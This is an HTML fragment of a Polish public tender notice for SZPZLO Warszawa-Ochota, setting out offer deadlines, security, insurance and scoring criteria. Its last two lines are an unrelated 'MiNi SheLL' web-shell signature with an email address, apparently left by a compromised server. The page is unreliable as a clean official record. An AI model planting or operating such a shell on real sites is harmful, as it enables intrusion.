Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy, w stosunku do treści wybranej oferty, w zakresie<br/>uregulowanym w art. 454-455 Ustawy oraz wskazanym we Wzorze Umowy, stanowiącym Załącznik nr 5 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-09-10 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/970298</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-09-10 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">5</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający informuje, iż w dniu 02 września 2024 r., na godz. 12.00 zaprasza Wykonawców na odbycie fakultatywnej wizji lokalnej. Zgłoszenia do uczestnictwa w wizji proszę przesłać na adres mailowy: zamowienia@szpzlo-ochota.pl ; szczegóły w SWZ<br/>DOKUMENTACJA TECHNICZNA DO POBRANIA POD LINKIEM <br/>http://www.bip.szpzlo-ochota.pl/userfiles/file/bip/komplet_projektow.zip <br/><br/>1.	Zamawiający wymaga wniesienia zabezpieczenia należytego wykonania umowy w wysokości 5% (pięciu procent) ceny całkowitej podanej w ofercie.<br/>Szczegóły w SWZ<br/>Najpóźniej w dniu zawarcia umowy w sprawie zamówienia publicznego, Wykonawca zobowiązany jest do przedłożenia Zamawiającemu, aktualnej i opłaconej polisy OC w zakresie prowadzonej działalności związanej z przedmiotem umowy albo innego dokumentu, potwierdzającego posiadanie przez Wykonawcę ubezpieczenia OC w zakresie prowadzonej działalności związanej w przedmiotem umowy, deliktowej i kontraktowej – tj. obejmującej swoim zakresem roszczenia z tytułu niewykonania lub nienależytego wykonania zobowiązań, na jedno i wszystkie zdarzenia w zakresie prowadzonej działalności na sumę gwarancyjną minimum 1 000.000,00 zł (słownie: jeden milion złotych).<br/><br/>1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1)	Cena ofertowa „Co” – 50%;<br/>2)	Okres gwarancji i rękojmi, serwisu i przeglądów „G”– 20%;<br/>3)	Termin wykonania zamówienia „T” – 30%<br/>2.	Podstawą przyznania punktów:<br/>1)	w kryterium „Cena ofertowa – „Co” - oferta z najniższą ceną ofertową otrzyma 50 pkt, <br/>a każda pozostała zgodnie ze wzorem:<br/><br/> najniższa oferowana cena <br/> ilość punktów pkt = --------------------------------------------- x 50 % = 50 pkt<br/> za cenę ofertową „Co” cena ofertowa oferty badanej<br/><br/>	<br/> „Co” – ilość punktów przyznana w kryterium „Cena ofertowa”<br/><br/>2)	w kryterium „Okres gwarancji i rękojmi, serwisu i przeglądów – „G”” - w zakresie tego kryterium oceniane będzie zaoferowanie jak najdłuższego okresu gwarancji i rękojmi, serwisu i przeglądów. Najkrótszy okres gwarancji wynosi 24 (dwadzieścia cztery) miesiące i krócej, najdłuższy 60 (sześćdziesiąt) miesięcy. Oferta z najdłuższym okresem gwarancji otrzyma 20 punktów, a pozostałe zgodnie z poniższą punktacją:<br/>• 48 miesięcy – 15 pkt<br/>• 36 miesięcy – 10 pkt<br/>• 24 i mniej miesięcy – 0 pkt<br/><br/>UWAGA:<br/>W przypadku niewskazania w Formularzu oferty, stanowiącym Załącznik nr 4 do SWZ, informacji dot. – „Oferowanego okresu gwarancji i rękojmi, serwisu i przeglądów”, Zamawiający przyjmie, że Wykonawca zaoferował 24 (dwudziesto cztero) miesięczny <br/>i krótszy okres gwarancji, i rękojmi, serwisów i przeglądów, i przyzna w tym kryterium <br/>0 (zero) punktów. Oferta obejmująca ww. termin 24 (dwudziesto cztero) miesięczny <br/>i krótszy, oraz dłuższy niż 60 (sześćdziesiąt) miesięcy, zostanie odrzucona, jako niezgodna z warunkami zamówienia.<br/><br/>„G” – ilość punktów przyznana w kryterium „Okres gwarancji i rękojmi, serwisów <br/>i przeglądów”<br/><br/>3)	w kryterium „Termin wykonania zamówienia „T”, w zakresie tego kryterium oceniany będzie zaoferowany termin wykonania zamówienia. Oferta z 6 (sześcio) tygodniowym terminem realizacji zamówienia, otrzyma 30 pkt, a każda następna zgodnie z poniższą punktacją:<br/>•	7 tygodni od podpisania umowy – 20 pkt;<br/>•	8 tygodni od podpisania umowy – 10 pkt;<br/>•	9 i węcej tygodni i więcej od podpisania umowy – 0 pkt;<br/><br/>UWAGA:<br/>W przypadku niewskazania w Formularzu oferty, stanowiącym Załącznik nr 4 do SWZ, informacji dot. terminu realizacji zamówienia, Zamawiający przyjmie, że Wykonawca zaoferował maksymalny, 9-cio tygodniowy termin realizacji zamówienia i przyzna w tym kryterium 0 (zero) punktów. Oferta obejmująca ww. termin 9-cio tygodniowy i dłuższy oraz krótszy niż 6 (sześć) tygodni, zostanie odrzucona, jako niezgodna z warunkami zamówienia.<br/>„T” - ilość punktów przyznana w kryterium „ Termin wykonania zamówienia”.

Creat By MiNi SheLL
Email: jattceo@gmail.com